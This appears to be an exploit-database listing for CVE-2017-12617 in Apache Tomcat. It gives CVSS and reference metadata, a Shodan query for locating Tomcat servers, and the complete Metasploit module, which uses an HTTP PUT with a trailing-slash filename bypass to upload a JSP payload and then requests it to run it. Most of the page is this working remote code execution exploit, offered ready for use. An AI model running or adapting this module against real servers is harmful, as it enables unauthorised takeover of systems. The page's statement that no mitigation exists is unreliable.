header-logo
Suggest Exploit
vendor:
N/A
by:
peewpw
8,1
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: CVE-2017-12617
CPE: N/A
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2017-12617/https://www.rapid7.com/db/vulnerabilities/oracle-missing-cpu-jan-2018-cve-2017-12617/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2017-12617/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2017-12617/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp1-cve-2017-12617/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2017-12617/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2017-12617/https://www.rapid7.com/db/vulnerabilities/suse-cve-2017-12617/https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2017-12617/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2017-12617/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2017-12617/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2017-12617/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2017-12617/https://www.rapid7.com/db/vulnerabilities/debian-cve-2017-12617/
Other Scripts: N/A
Tags: cve,cve2017,tomcat,apache,rce,kev,intrusive
CVSS Metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://versa-networks.com/blog/apache-tomcat-remote-code-execution-vulnerability-cve-2017-12617/https://github.com/cyberheartmi9/CVE-2017-12617https://www.exploit-db.com/exploits/43008https://nvd.nist.gov/vuln/detail/CVE-2017-12617http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
Nuclei Metadata: {'verified': 'true', 'max-request': 2, 'shodan-query': 'html:"Apache Tomcat"', 'vendor': 'apache', 'product': 'tomcat'}
Platforms Tested: Linux, Windows
2017

Tomcat RCE via JSP Upload Bypass

When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Mitigation:

No known mitigation or remediation for this vulnerability
Source

Exploit-DB raw data:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tomcat RCE via JSP Upload Bypass',
      'Description'    => %q{
        This module uploads a jsp payload and executes it.
      },
      'Author'      => 'peewpw',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-12617' ],
          [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617' ],
          [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ]
        ],
      'Privileged'     => false,
      'Platform'    => %w{ linux win }, # others?
      'Targets'     =>
        [
          [ 'Automatic',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ],
          [ 'Java Windows',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ],
          [ 'Java Linux',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'linux'
            }
          ]
        ],
      'DisclosureDate' => 'Oct 03 2017',
      'DefaultTarget'  => 0))

    register_options([
        OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]),
        Opt::RPORT(8080)
      ])
  end

  def check
    testurl = Rex::Text::rand_text_alpha(10)
    testcontent = Rex::Text::rand_text_alpha(10)

    send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method'    => 'PUT',
      'data'      => "<% out.println(\"#{testcontent}\");%>"
    })

    res1 = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp"),
      'method'    => 'GET'
    })

    if res1 && res1.body.include?(testcontent)
      send_request_cgi(
        opts = {
          'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
          'method'    => 'DELETE'
        },
        timeout = 1
      )
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Uploading payload...")
    testurl = Rex::Text::rand_text_alpha(10)

    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method'    => 'PUT',
      'data'      => payload.encoded
    })
    if res && res.code == 201
      res1 = send_request_cgi({
        'uri'       => normalize_uri(target_uri.path, "#{testurl}.jsp"),
        'method'    => 'GET'
      })
      if res1 && res1.code == 200
        print_status("Payload executed!")
      else
        fail_with(Failure::PayloadFailed, "Failed to execute the payload")
      end
    else
      fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
    end
  end

end

Navigation

Suggest Exploit

Services By CQR